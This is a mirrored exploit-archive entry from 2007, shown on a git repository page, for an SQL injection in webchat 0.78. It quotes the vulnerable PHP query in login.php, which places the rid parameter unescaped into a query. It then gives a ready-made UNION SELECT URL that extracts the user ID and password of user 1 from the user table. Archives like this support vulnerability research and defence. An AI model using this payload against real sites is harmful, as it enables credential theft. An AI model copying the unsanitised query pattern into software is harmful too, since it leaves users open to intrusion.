bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4125.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

38 lines
No EOL
1.3 KiB
Text
Raw Blame History

#########################################################################
#
# [webchat 0.78]
#
# Class: SQL Injection
# Published 28/06/2007
# Remote: Yes
# Critical Level : Dangerous
# Site: http://sourceforge.net/projects/webdev-webchat/
# Download: http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
# Author: r00t
#########################################################################
Vulnerable code:
login.php
======================================================
<?
$q = new DB_Chat;
$q->query("select * from room where rid='$rid'");
if ($q->next_record()) {
?>
=======================================================
Exploit :
============================================================================================================
http://www.site.com/[web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*
============================================================================================================
Thanks To:
======================================================
All Root@Shell members;
White_Sheep;
SparrowRulez;
st0ke;
======================================================
# milw0rm.com [2007-06-28]
Reference in a new issue View git blame Copy permalink